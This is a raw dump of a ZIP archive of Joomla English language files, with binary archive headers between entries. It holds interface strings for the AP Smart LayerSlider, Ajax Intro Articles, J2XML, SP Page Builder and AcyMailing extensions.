AP_DESCRIPTION_POPUP="<span style='font-size:90%;'>Description for this slide, including layers. If you are new to this (working with HTML content), you can use “Example HTML layer” on the left to start with the first layer.</span>"
AP_MODAL_EXAMPLE_TXT="<span class='icomoon-info'></span> Example HTML layer:
<pre style='font-size:80%;'>&lt;div class=&quot;<strong style='color:#707070;font-size:115%;font-weight:600;'>sp-layer</strong>&quot;
data-position=&quot;topLeft&quot;
data-horizontal=&quot;50&quot;
data-vertical=&quot;100&quot;
data-show-transition=&quot;left&quot;
data-show-duration=&quot;1200&quot;
data-show-delay=&quot;700&quot;&gt;
<span style='color:#444;font-size:90%;font-weight:500;'>&lt;h1 style=&quot;color:#fff;&quot;&gt;</span><strong style='color:#707070;font-size:110%;font-weight:600;'>Sample html content goes here...</strong><span style='color:#444;font-weight:500;font-size:90%;'>&lt;/h1&gt;</span>
&lt;/div&gt;</pre>
<a style='font-size:90%;text-align:center;display:table;margin:0 auto;' href='https://aplikko.com/ap-smart-layerslider-working-with-layers' target='_blank'><span class='fa fa-support'></span> Online Documentation</a>"
AP_CLOSE="Close"
AP_OK="OK"

PK!�{��
+
+'en-GB/en-GB.mod_ajax_intro_articles.ininu&1i�;
;	@package	Ajax Intro Articles Module
;	@copyright	Copyright (C) 2018 Aplikko. All rights reserved.
;	@license	GNU/GPL version 2, or later
;	@website:	http://www.aplikko.com
;
; Note : All ini files need to be saved as UTF-8 - No BOM

MOD_AJAX_INTRO_ARTICLES="Latest Articles as Masonry Grid"
MOD_AJAX_INTRO_ARTICLES_XML_DESCRIPTION="This Module shows a list of the most recently published and current Articles in Masonry Grid with Ajax Loading."

MOD_AJAX_INTRO_ARTICLES_ALERT="<strong>Warning!</strong> Something went wrong. Check your settings and check if you have published articles in this category."

MOD_AJAX_INTRO_ARTICLES_COUNT="Start Items"
MOD_AJAX_INTRO_ARTICLES_COUNT_DESC="The number of Articles to display at start (page load). Default is 3."
MOD_AJAX_INTRO_ARTICLES_LIMIT="Ajax Limit"
MOD_AJAX_INTRO_ARTICLES_LIMIT_DESC="Number of Items to call with Ajax request."
MOD_AJAX_INTRO_ARTICLES_FEATURED="Featured Articles"
MOD_AJAX_INTRO_ARTICLES_FEATURED_DESC="Show/Hide Articles designated as Featured"
MOD_AJAX_INTRO_ARTICLES_ORDERING="Order"
MOD_AJAX_INTRO_ARTICLES_ORDERING_DESC="Recently Added First: order the articles using their creation date<br />Recently Modified First: order the articles using their modification date<br />Recently Published First: order the articles using their publication date.<br />Recently Touched First: order the articles using their modification or creation dates."
MOD_AJAX_INTRO_ARTICLES_USER_DESC="Filter by author"
MOD_AJAX_INTRO_ARTICLES_USER="Authors"
MOD_AJAX_INTRO_ARTICLES_VALUE_ADDED_BY_ME="Added or modified by me"
MOD_AJAX_INTRO_ARTICLES_VALUE_ANYONE="Anyone"
MOD_AJAX_INTRO_ARTICLES_VALUE_NOTADDED_BY_ME="Not added or modified by me"
MOD_AJAX_INTRO_ARTICLES_VALUE_ONLY_SHOW_FEATURED="Only show Featured Articles"
MOD_AJAX_INTRO_ARTICLES_VALUE_RECENT_ADDED="Recently Added First"
MOD_AJAX_INTRO_ARTICLES_VALUE_RECENT_MODIFIED="Recently Modified First"
MOD_AJAX_INTRO_ARTICLES_VALUE_RECENT_RAND="Random Articles"
MOD_AJAX_INTRO_ARTICLES_VALUE_RECENT_PUBLISHED="Recently Published First"
MOD_AJAX_INTRO_ARTICLES_VALUE_RECENT_TOUCHED="Recently Touched First"

; Columns
MOD_AJAX_INTRO_ARTICLES_COLUMNS_NOTE="Columns Settings"
MOD_AJAX_INTRO_ARTICLES_COLUMNS="Select Columns"
MOD_AJAX_INTRO_ARTICLES_COLUMNS_DESC="Select Number of Columns. Using Bootstrap's grid system, you can set up to 6 columns across the container. Bootstrap’s grid system uses a series of containers, rows, and columns to layout and align content. Default value is ”3 Columns”."
MOD_AJAX_INTRO_ARTICLES_1_COL="1 Column"
MOD_AJAX_INTRO_ARTICLES_2_COL="2 Columns"
MOD_AJAX_INTRO_ARTICLES_3_COL="3 Columns"
MOD_AJAX_INTRO_ARTICLES_4_COL="4 Columns"
MOD_AJAX_INTRO_ARTICLES_6_COL="6 Columns"
MOD_AJAX_INTRO_ARTICLES_COLUMNS_SPACING="Columns Spacing"
MOD_AJAX_INTRO_ARTICLES_COLUMNS_SPACING_DESC="Choose Spacing between Columns, range from 0 to 50 pixels. Default value is ”15 pixels”."
MOD_AJAX_INTRO_ARTICLES_COLUMNS_BACKGROUND_COLOR="Columns Background Color"
MOD_AJAX_INTRO_ARTICLES_COLUMNS_BACKGROUND_COLOR_DESC="Choose Custom Background Color for Columns (items)."
MOD_AJAX_INTRO_ARTICLES_INNER_SPACING="Inner Spacing"
MOD_AJAX_INTRO_ARTICLES_INNER_SPACING_DESC="Choose Inner Spacing inside Columns (items), range from 0 to 50 pixels. Default value is ”0” (no spacing)."
MOD_AJAX_INTRO_ARTICLES_AJAX_INTRO_ALIGNMENT="Intro Format Alignment"
MOD_AJAX_INTRO_ARTICLES_AJAX_INTRO_ALIGNMENT_DESC="Choose Alignment for Intro Format, for ”Intro Image” or ”Post Formats”. NOTE: This option applies only for ”1 Column” Environment. Default value is ”Center”."
MOD_AJAX_INTRO_ARTICLES_INTRO_WIDTH="Intro Image or Post Format Custom Width"
MOD_AJAX_INTRO_ARTICLES_INTRO_WIDTH_DESC="Choose Custom Width for Intro Image or Post Format. NOTE: This option applies only for ”1 Column” Environment, and for ”Left” or ”Right” Alignment. Default value is ”50%”."
MOD_AJAX_INTRO_ARTICLES_EQUAL_HEIGHT="Equal Heights for Columns"
MOD_AJAX_INTRO_ARTICLES_EQUAL_HEIGHT_DESC="Choose this option if you want to show columns with ”Equal Height” instead of ”Masonry” (default), only applies for 2, 3, 4, or 6 columns. Default value is ”Hide” (Masonry)."

; Ajax Items
MOD_AJAX_INTRO_ARTICLES_AJAX_LOADING_BUTTON_OPTIONS="Ajax Loading Options"
MOD_AJAX_INTRO_ARTICLES_AJAX_LOADING_APPEAR_EFFECTS="Ajax Loading Effects"
MOD_AJAX_INTRO_ARTICLES_AJAX_LOADING_APPEAR_EFFECTS_DESC="Choose one of the Animation Effects to show Columns (Articles) on Ajax Load. Default effect is ”Appear In”."
MOD_AJAX_INTRO_ARTICLES_APPEARIN="Appear In"
MOD_AJAX_INTRO_ARTICLES_SIMPLEFADE="Simple Fade"
MOD_AJAX_INTRO_ARTICLES_FADEINUP="Fade in Up"
MOD_AJAX_INTRO_ARTICLES_FADEINDOWN="Fade in Down"
MOD_AJAX_INTRO_ARTICLES_ZOOMIN="Zoom In"
MOD_AJAX_INTRO_ARTICLES_NONE="None"

; Buttons
MOD_AJAX_INTRO_ARTICLES_AJAX_LOADING_BUTTON="Ajax Loading Button"
MOD_AJAX_INTRO_ARTICLES_AJAX_LOADING_BUTTON_DESC="Choose Style for Ajax Loading Button."
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_DARK="Dark"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_LIGHT="Light"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_DEFAULT="Default"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_PRIMARY="Primary"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_SECONDARY="Secondary"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_SUCCESS="Success"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_INFO="Info"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_WARNING="Warning"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_DANGER="Danger"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_DARK="Dark"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_LINK="Link"
MOD_AJAX_INTRO_ARTICLES_AJAX_LOADER="Load More"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_LARGE="Large"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_SMALL="Small"
MOD_AJAX_INTRO_ARTICLES_AJAX_BUTTON_XSMALL="Extra Small"
MOD_AJAX_INTRO_ARTICLES_AJAX_LOADER_TEXT="Ajax Loader text"
MOD_AJAX_INTRO_ARTICLES_AJAX_LOADER_TEXT_DESC="Choose Custom text for Ajax Loader Button"
MOD_AJAX_INTRO_ARTICLES_AJAX_LOADER_TEXT_COLOR="Ajax Loader text Color"
MOD_AJAX_INTRO_ARTICLES_AJAX_LOADER_TEXT_COLOR_DESC="Choose Custom Color for text, for Ajax Loader Button"

MOD_AJAX_INTRO_ARTICLES_STYLING_OPTIONS="Styling Options"
MOD_AJAX_INTRO_ARTICLES_INTRO_STYLES="Intro Format"
MOD_AJAX_INTRO_ARTICLES_INTRO_FORMAT="Select Intro Format"
MOD_AJAX_INTRO_ARTICLES_INTRO_FORMAT_DESC="Select format for Intro: Post Formats or Intro Images"
MOD_AJAX_INTRO_ARTICLES_INTRO_IMAGE_LINK="Link Intro Image"
MOD_AJAX_INTRO_ARTICLES_INTRO_IMAGE_LINK_DESC="Choose if you want to link Intro Image to its Article."
MOD_AJAX_INTRO_ARTICLES_RTL="Enable RTL direction"
MOD_AJAX_INTRO_ARTICLES_RTL_DESC="Enable this option, to force Masonry to use RTL (Right-To-Left) direction. Default value is ”No”, which is LTR (Left-to-Right)."

MOD_AJAX_INTRO_ARTICLES_STYLES="Styles (Themes)"
MOD_AJAX_INTRO_ARTICLES_STYLES_DESC="Choose one of the themes for Ajax Intro Articles (Columns). Default value is ”Flex Style”."

MOD_AJAX_INTRO_ARTICLES_INTROTEXT_OVERLAY_EFFECTS="Overlay Effects"
MOD_AJAX_INTRO_ARTICLES_INTROTEXT_OVERLAY_EFFECTS_DESC="Choose one or more ”Effects” when hover over Overlay. ”Zoom”, ”Grayscale” and  ”Blur” are available effects for ”Overlay Style”."
MOD_AJAX_INTRO_ARTICLES_INTROTEXT_OVERLAY_ZOOM="Zoom"
MOD_AJAX_INTRO_ARTICLES_INTROTEXT_OVERLAY_GRAYSCALE="Grayscale"
MOD_AJAX_INTRO_ARTICLES_INTROTEXT_OVERLAY_BLUR="Blur"
MOD_AJAX_INTRO_ARTICLES_OVERLAY_COLOR="Overlay Background Color"
MOD_AJAX_INTRO_ARTICLES_OVERLAY_COLOR_DESC="Select RGBA color for Overlay Background."

MOD_AJAX_INTRO_ARTICLES_SHOW_TITLE="Show Title"
MOD_AJAX_INTRO_ARTICLES_SHOW_TITLE_DESC="Shows or Hides Article Title."
MOD_AJAX_INTRO_ARTICLES_TITLE_SIZE="Title Size"
MOD_AJAX_INTRO_ARTICLES_TITLE_SIZE_DESC="Choose Custom Size for Article Title, range from 12 to 36 pixels. Default value is ”22” pixels."
MOD_AJAX_INTRO_ARTICLES_INTROTEXT="Show Introtext"
MOD_AJAX_INTRO_ARTICLES_INTROTEXT_DESC="If set to Show, the Intro Text of the article will show be displayed." 
MOD_AJAX_INTRO_ARTICLES_INTROTEXT_LIMIT_WORDS="Limit Introtext Words"
MOD_AJAX_INTRO_ARTICLES_INTROTEXT_LIMIT_WORDS_DESC="Maximum Words for Introtext. Range from 0 to 100 Words. Set 0 to show all words without limit. Default value: ”25” words."
MOD_AJAX_INTRO_ARTICLES_INTROTEXT_STRIP_TAGS="Strip Tags (Introtext)"
MOD_AJAX_INTRO_ARTICLES_INTROTEXT_STRIP_TAGS_DESC="Remove HTML Tags for Introtext, by enabling this feature. Default value is ”No”."
MOD_AJAX_INTRO_ARTICLES_INTROTEXT_SIZE="Introtext Size"
MOD_AJAX_INTRO_ARTICLES_INTROTEXT_SIZE_DESC="Choose Custom Size for Introtext (Description), range from 12 to 28 pixels. Default value is ”15” pixels."
MOD_AJAX_INTRO_ARTICLES_SHOW_DATE="Show Date"
MOD_AJAX_INTRO_ARTICLES_SHOW_DATE_DESC="If set to Show, the date and time an Article was published will be displayed. This is a global setting but can be changed at the Category, Menu and Article levels."
MOD_AJAX_INTRO_ARTICLES_DATEFIELDFORMAT_LABEL="Date Format"
MOD_AJAX_INTRO_ARTICLES_DATEFIELDFORMAT_DESC="Please enter in a valid date format. Eg: DATE_FORMAT_LC2, DATE_FORMAT_LC3, DATE_FORMAT_LC4, Y-m-d, etc. See: http://php.net/date for formatting information."

MOD_AJAX_INTRO_ARTICLES_SHOW_CATEGORY="Show category"
MOD_AJAX_INTRO_ARTICLES_SHOW_CATEGORY_DESC="Select Show if you would like the category name displayed."
MOD_AJAX_INTRO_ARTICLES_POSTED="Posted in: "
MOD_AJAX_INTRO_ARTICLES_SHOW_HITS="Show Hits"
MOD_AJAX_INTRO_ARTICLES_SHOW_HITS_DESC="If set to Show, the number of Hits on a particular Article will be displayed."
MOD_AJAX_INTRO_ARTICLES_RATING="Rating"
MOD_AJAX_INTRO_ARTICLES_SHOW_RATING="Show Ratings"
MOD_AJAX_INTRO_ARTICLES_SHOW_RATING_DESC="If set to Show, Rating system for article will be displayed."
MOD_AJAX_INTRO_ARTICLES_SHOW_AUTHOR="Show Author"
MOD_AJAX_INTRO_ARTICLES_SHOW_AUTHOR_DESC="Select Show if you would like the author (or author alias instead, if available) to be displayed."
MOD_AJAX_INTRO_ARTICLES_AJAX_READMORE_BUTTON_TXT="Read More"
MOD_AJAX_INTRO_ARTICLES_AJAX_READMORE_BUTTON="Readmore Button"
MOD_AJAX_INTRO_ARTICLES_AJAX_READMORE_BUTTON_DESC="Choose Style for Readmore Button."
MOD_AJAX_INTRO_ARTICLES_AJAX_READMORE_TEXT_HINT="Read More"
MOD_AJAX_INTRO_ARTICLES_AJAX_READMORE_TEXT="Readmore Button text"
MOD_AJAX_INTRO_ARTICLES_AJAX_READMORE_TEXT_DESC="Choose Custom text for Readmore Button"
MOD_AJAX_INTRO_ARTICLES_AJAX_READMORE_ALIGN_READMORE="Align Readmore Button"
MOD_AJAX_INTRO_ARTICLES_AJAX_READMORE_ALIGN_LEFT="Align Left"
MOD_AJAX_INTRO_ARTICLES_AJAX_READMORE_ALIGN_CENTER="Align Center"
MOD_AJAX_INTRO_ARTICLES_AJAX_READMORE_ALIGN_RIGHT="Align Right"
MOD_AJAX_INTRO_ARTICLES_SHOW_SOCIAL_SHARE="Show Social Share"
MOD_AJAX_INTRO_ARTICLES_SHOW_SOCIAL_SHARE_DESC="Enable this option to social share buttons in joomla blog list or single article. Notice: This option needs to be enabled also in template’s admin > Blog."
MOD_AJAX_INTRO_ARTICLES_SHOW_TAGS="Show Tags"
MOD_AJAX_INTRO_ARTICLES_SHOW_TAGS_DESC="Enable this option to tags for articles."PK!����33#en-GB/en-GB.files_cli_j2xml.sys.ininu&1i�; J2XML 3.1.1
; Copyright (C) 2010 - 2013 Helios Ciancio. All rights reserved.
; License GNU General Public License version 3 or later; see LICENSE.php
; Note : All ini files need to be saved as UTF-8

CLI_J2XML="J2XML CLI"
CLI_J2XML_XML_DESCRIPTION="<strong>J2XML</strong> - Command Line Interface"
PK!th���!en-GB/en-GB.com_sppagebuilder.ininu&1i�COM_SPPAGEBUILDER_PAGE_SAVE_SUCCESS="Page successfully saved."
COM_SPPAGEBUILDER_PAGE_TITLE_REQUIRED="Page title is required."
COM_SPPAGEBUILDER_PAGE_EDIT="Edit Page"
COM_SPPAGEBUILDER_ERROR_PAGE_NOT_FOUND="Page Not Found"
COM_SPPAGEBUILDER_ERROR_EDIT_PERMISSION="You are not permitted to edit this page."
COM_SPPAGEBUILDER_NO_ITEMS_FOUND="No item found!"
COM_SPPAGEBUILDER_RECAPTCHA_NOT_INSTALLED="Please make sure that, re-captcha pluging is enabled"
COM_SPPAGEBUILDER_INVALID_CAPTCHA="Invalid Recaptcha"

; Ajax Contact
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_NAME="Name"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_EMAIL="Email"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUBJECT="Subject"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_MESSAGE="Message"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_PHONE="Phone"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SEND="Send Message"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_WRONG_CAPTCHA="Wrong answer! Please enter right answer."
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SUCCESS="Email sent successfully!"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_FAILED="Email sent failed."
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_CAPTCHA_NOT_INSTALLED="Please make sure that, re-captcha pluging is enabled"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INVALID_CAPTCHA="Invalid Recaptcha"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_INVISIBLE_CAPTCHA_NOT_INSTALLED="Please make sure reCaptcha v3(invisible) is enabled or reCaptcha secret/site key is valid."
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_SENDER_IP="Sender IP"
COM_SPPAGEBUILDER_ADDON_AJAX_CONTACT_TAC="Accepted Terms, Privacy/GDPR"

; Tweet Addon
COM_SPPAGEBUILDER_TWEET_FOLLOWERS="Followers"
COM_SPPAGEBUILDER_TWEET_FOLLOW="Follow"
COM_SPPAGEBUILDER_SECOND="Second"
COM_SPPAGEBUILDER_SECONDS="Seconds"
COM_SPPAGEBUILDER_MINUTE="Minute"
COM_SPPAGEBUILDER_MINUTES="Minutes"
COM_SPPAGEBUILDER_HOUR="Hour"
COM_SPPAGEBUILDER_HOURS="Hours"
COM_SPPAGEBUILDER_DAY="Day"
COM_SPPAGEBUILDER_DAYS="Days"
COM_SPPAGEBUILDER_MONTHS="Months"
COM_SPPAGEBUILDER_MONTH="Month"
COM_SPPAGEBUILDER_YEAR="Year"
COM_SPPAGEBUILDER_YEARS="Years"
COM_SPPAGEBUILDER_AGO="ago"

; Addon Social Share
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_TOTAL_SHARES="Shares"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_FACEBOOK="Facebook"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_TWITTER="Twitter"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_GOOGLE_PLUS="Google Plus"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_LINKEDIN="Linkedin"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_PINTEREST="Pinterest"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_THUMBLR="Thublr"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_GETPOCKET="Getpocket"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_REDDIT="Reddit"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_VK="VK"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_XING="Xing"
COM_SPPAGEBUILDER_ADDON_SOCIALSHARE_WHATSAPP="WhatsApp"

;Article Addon
COM_SPPAGEBUILDER_ADDON_ARTICLE_NO_ITEMS_FOUND="No item found!"

; Instagram
COM_SPPAGEBUILDER_ADDON_INSTAGRAM_ERORR="No item found! Please make sure that your <strong>Instagram User ID</strong> and <strong>Access Token</strong> is correct"
COM_SPPAGEBUILDER_ADDON_INSTAGRAM_REDIRECT="Instagram Redirect Link"

;Optin Form;
COM_SPPAGEBUILDER_ADDON_OPTIN_FORM_EMPTY_API="Please insert your API key for"
COM_SPPAGEBUILDER_ADDON_OPTIN_PLATFORM_EMAIL_PENDING="We need to confirm your email address. To complete the subscription process, please click the link in the email we just sent you."
COM_SPPAGEBUILDER_ADDON_OPTIN_PLATFORM_EMAIL_CONFIRMED="Your subscription to our list has been confirmed. Thank you for subscribing!"
COM_SPPAGEBUILDER_ADDON_OPTIN_PLATFORM_EMAIL_UPDATED="Your email was updated successfully."
COM_SPPAGEBUILDER_ADDON_OPTIN_PLATFORM_EMAIL_EXIST="You are already subscribed."
COM_SPPAGEBUILDER_ADDON_OPTIN_PLATFORM_EMAIL_ERROR="Some problem occurred, please try again."
COM_SPPAGEBUILDER_ADDON_OPTIN_PLATFORM_ACYMAILING_NOT_INSTALLED="Please make sure that AcyMailing is installed and activated."

COM_SPPAGEBUILDER_MEDIA_MANAGER_DELETE_FAILED="Unable to delete"

;Social Share;
COM_SPPB_ADDON_SOCIALSHARE_API_NOT_FOUND="Please Insert your API key to get social count."

;Accessible Text
COM_SPPAGEBUILDER_ARIA_NEXT="Next"
COM_SPPAGEBUILDER_ARIA_PREVIOUS="Previous"
COM_SPPAGEBUILDER_ARIA_BUTTON_TEXT="Button"

;Table Advanced
COM_SPPAGEBUILDER_ADDON_TABLE_ADVANCED_SEARCH_PLACEHOLDER="Type Here To Search"
PK!vٖ����en-GB/en-GB.com_acym.ininu&1i�ACYM_VERSION="6.18.3"


ACYM_CLASSIC_CONDITIONS="Classic conditions"
ACYM_SPECIFIC_CONDITIONS_TRIGGER="Specific conditions from the chosen trigger"
ACYM_NEW_FOLLOW_UP_EMAIL="New follow-up email"
ACYM_UNNAMED_FOLLOWUP="Unnamed follow-up"
ACYM_EVERY_CATEGORIES="Every categories"
ACYM_OVERRIDES_REQUIREMENT="The email override system needs the plugin &quot;AcyMailing - Override Joomla emails&quot; to be active"
ACYM_OVERRIDES="Overrides"
ACYM_ORIGINAL_EMAIL_DATA="Original email data"
ACYM_LINK_EXPORT_FILE_OVERRIDE_DESC="The link to export the user data"
ACYM_LINK_EXPORT_FILE="Link export file"
ACYM_EXPIRATION_DATE_OVERRIDE_DESC="The expiration date of the link to perform the action"
ACYM_EXPIRATION_DATE="Expiration date"
ACYM_LINK_OVERRIDE_DESC="Link of the content to share"
ACYM_SENDER_EMAIL_OVERRIDE_DESC="The email of the sender"
ACYM_SENDER_EMAIL="Sender email"
ACYM_SENDER_NAME_OVERRIDE_DESC="The name of the sender"
ACYM_SENDER_NAME="Sender name"
ACYM_ACTIVATION_LINK_OVERRIDE_DESC="The link to active the user"
ACYM_ACTIVATION_LINK="Activation link"
ACYM_PASSWORD_OVERRIDE_DESC="The password of the user"
ACYM_PASSWORD="Password"
ACYM_USER_NAME_OVERRIDE_DESC="The name of the user"
ACYM_LINK_TEXT_OVERRIDE_DESC="The link for the user to do the action in plain text"
ACYM_LINK_TEXT="Link text"
ACYM_TOKEN_OVERRIDE_DESC="The confirmation token generated to reset the password"
ACYM_TOKEN="Confirmation token"
ACYM_ACTION_CONFIRM_URL_OVERRIDE_DESC="The URL for the user to confirm the action requested"
ACYM_ACTION_CONFIRM_URL="URL confirm action"
ACYM_ADMIN_URL_OVERRIDE_DESC="The admin URL of your site"
ACYM_ADMIN_URL="Admin URL"
ACYM_LINK_RESET_PASSWORD_OVERRIDE_DESC="Link to reset the user password"
ACYM_LINK_RESET_PASSWORD="Link reset password"
ACYM_PRIVACY_POLICY_URL_OVERRIDE_DESC="The URL leading to your privacy policy page"
ACYM_PRIVACY_POLICY_URL="Privacy policy URL"
ACYM_MANAGE_URL_OVERRIDE_DESC="The URL for the admin to manage the user data request"
ACYM_MANAGE_URL="Manage user request URL"
ACYM_ACTION_OVERRIDE_DESC="The action to apply on the user"
ACYM_ACTION="Action"
ACYM_USER_NEW_EMAIL_OVERRIDE_DESC="The new email of the user"
ACYM_USER_NEW_EMAIL="User new email"
ACYM_USER_EMAIL_OVERRIDE_DESC="The email of the recipient"
ACYM_ADMIN_EMAIL_OVERRIDE_DESC="The email of the administrator"
ACYM_ADMIN_EMAIL="Administrator email"
ACYM_SITE_NAME_OVERRIDE_DESC="The name of your site"
ACYM_SITE_NAME="Site name"
ACYM_LOGIN_URL_OVERRIDE_DESC="The URL to set the password on first connection"
ACYM_LOGIN_URL="Login URL"
ACYM_EMAIL_OVERRIDE_DESC="The email of the user"
ACYM_USERNAME_OVERRIDE_DESC="The username of the user"
ACYM_USERNAME="Username"
ACYM_SITE_URL_OVERRIDE_DESC="The URL of your site"
ACYM_SITE_URL="Site URL"
ACYM_OVERRIDE_DESC_DATA_EXPORT="This email is sent when a request for data export is accepted"
ACYM_OVERRIDE_DESC_ACTION_CONFIRMATION="This email is sent to a user when a request has been made to perform an action on his account"
ACYM_OVERRIDE_DESC_CHANGE_EMAIL="This is a confirmation email sent when a user requests an email address modification"
ACYM_OVERRIDE_DESC_DATA_REMOVAL_CONFIRMATION_PRIVACY="This is a confirmation email sent to the user once their data has been removed from the site, with privacy policy link"
ACYM_OVERRIDE_DESC_DATA_REMOVAL_CONFIRMATION="This is a confirmation email sent to the user once their data has been removed from the site, without privacy policy link"
ACYM_OVERRIDE_DESC_ADMIN_NOTIFICATION_DATA_REQUEST="This email is sent to the admin when a user has confirmed a data privacy request"
ACYM_OVERRIDE_DESC_ADMIN_NOTIFICATION_CHANGE_PASSWORD="This notification is sent to the admin when a user password has been changed"
ACYM_OVERRIDE_DESC_CONFIRMATION_CHANGE_EMAIL="This notification is sent to the user when their email address has been changed"
ACYM_OVERRIDE_DESC_CONFIRMATION_CHANGE_PASSWORD="This notification is sent to the user when their password has been changed"
ACYM_OVERRIDE_DESC_ARTICLE_SHARE="This email is sent when a user shares an article of your website to someone"
ACYM_OVERRIDE_DESC_ADMIN_ACTIVATION_NOTIFICATION="This email is sent to the admin when they need to activate an account"
ACYM_OVERRIDE_DESC_REG_ADMIN_NOTIFICATION="This is the notification sent to the site admin when a user created an account on the site"
ACYM_OVERRIDE_DESC_ADMIN_CREATED="This email is sent to the user on account's creation"
ACYM_OVERRIDE_DESC_REG_ADMIN_ACTIVATED="This email is sent to the user when an admin activated their account"
ACYM_OVERRIDE_DESC_REG_ADMIN_ACTIVATION_NO_PWD="This is the email sent when a user registers to your site telling that an admin needs to activate it, only if the password isn't sent"
ACYM_OVERRIDE_DESC_REG_ADMIN_ACTIVATION="This is the email sent when a user registers to your site telling that an admin needs to activate it, only if the password is sent"
ACYM_OVERRIDE_DESC_REG_ACTIVATION_NO_PWD="This is the activation email sent when a user registers to your site, only if the password isn't sent"
ACYM_OVERRIDE_DESC_REG_ACTIVATION="This is the activation email sent when a user registers to your site, only if the password is sent"
ACYM_OVERRIDE_DESC_DIRECT_REG="This is the account details email sent when a user registers to your site, only if no activation is required and the password is sent"
ACYM_OVERRIDE_DESC_DIRECT_REG_NO_PWD="This is the account details email sent when a user registers to your site, only if no activation is required and the password isn't sent"
ACYM_OVERRIDE_DESC_RESET_PASSWORD="This email is sent when a user resets their account password"
ACYM_OVERRIDE_DESC_REMIND_USERNAME="This email is sent when a user forgot their username and asks for a reminder"
ACYM_RESET="Reset"
ACYM_RESET_OVERRIDES_CONFIRMATION="Are you sure? Any modification you made on the override emails will be removed."
ACYM_RESET_OVERRIDE="Reset email overrides"
ACYM_INSTALL_OVERRIDE="Install email overrides"
ACYM_EMAILS_OVERRIDE_ARE_NOT_INSTALLED="Email overrides are not installed"
ACYM_EMAILS_OVERRIDE="Email overrides"
ACYM_CHECKDB_ADD_FOREIGN_KEY_SUCCESS="[OK]Problem solved: Added foreign key %1$s to table %2$s"
ACYM_CHECKDB_ADD_FOREIGN_KEY_ERROR="[ERROR]Could not add the foreign key %1$s on the table %2$s : %3$s"
ACYM_CHECKDB_WRONG_FOREIGN_KEY="Foreign key %1$s not well set for table %2$s"
ACYM_X_SUBSCRIBING_X_LIST="The user %1$s subscribing to %2$s"
ACYM_COULD_NOT_DELETE_MAIL="Could not delete the email"
ACYM_DELAY_SUMMARY="This delay is based on the time the user triggers the follow-up campaign"
ACYM_NO_EMAIL_FOR_FOLLOWUP="This follow-up doesn't have any email"
ACYM_FOLLOWUP_NOT_FOUND="Follow-up not found"
ACYM_TRIGGERED_FOR_X="Triggered for %s users"
ACYM_X_EMAILS="%s emails"
ACYM_WHEN_SEND_FOLLOWUPS_DESC="There isn't a specific delay to use for follow-up emails as it really depends on your activity.<br />For example a follow-up email that asks for a review sent after the purchase of a product, you can use some weeks of delay to let your customers the time to test your product.<br />The best solution is to test and learn. Try to send them some days after the event trigger and see how it goes."
ACYM_WHEN_SEND_FOLLOWUPS="When to send follow-ups?"
ACYM_WHY_USE_FOLLOWUPS_DESC="These emails can be used in different situations. The main goal is to remind users to do something.<br />This could be: completing an order, setting up a meeting, leave feedback, buy another product on an e-commerce website, etc..."
ACYM_WHY_USE_FOLLOWUPS="Why use follow-ups?"
ACYM_WHAT_ARE_FOLLOWUPS_DESC="A follow-up email is an email or sequence of emails sent in response to the actions of subscribers.<br />Using this feature you can set a batch of emails to be sent based on a specific action.<br />All of these emails have a specific sending delay (One day after the event, 10 days after, 2 months after and so on)"
ACYM_WHAT_ARE_FOLLOWUPS="What are follow-ups?"
ACYM_FOLLOW_UP="Follow-up"
ACYM_SAVING_EMAIL="Please wait while we're saving your email"
ACYM_FOLLOW_UP_CONDITION_USER_SUBSCRIBING="User %1$s subscribing to the list(s) %2$s"
ACYM_BIRTHDAY_FIELD_CUSTOM_FIELD_TYPE_DATE="The birthday field is an AcyMailing date custom field"
ACYM_X_PLUS_X_FOLLOW_UP="%1$s + %2$s"
ACYM_COULD_NOT_SAVE_DELAY_SETTINGS="Could not save the delay settings for this email"
ACYM_SEND_IT_X_X_AFTER_TRIGGER="Send this email %1$s %2$s after the trigger"
ACYM_ADD_AN_EMAIL="Add an email"
ACYM_CREATE_YOUR_FIRST_FOLLOW_UP_EMAIL="Create your first follow-up email!"
ACYM_DISPLAY_NAME_DESC="This is the name that will be displayed when a user visits the unsubscribe page"
ACYM_DISPLAY_NAME="Display name"
ACYM_SEND_ONCE="Send once"
ACYM_SEND_ONCE_DESC="Do you want this follow-up to be sent only once per user?"
ACYM_NO_CONDITION="No condition applied"
ACYM_BIRTHDAY_FIELD_IS="Birthday field is %s"
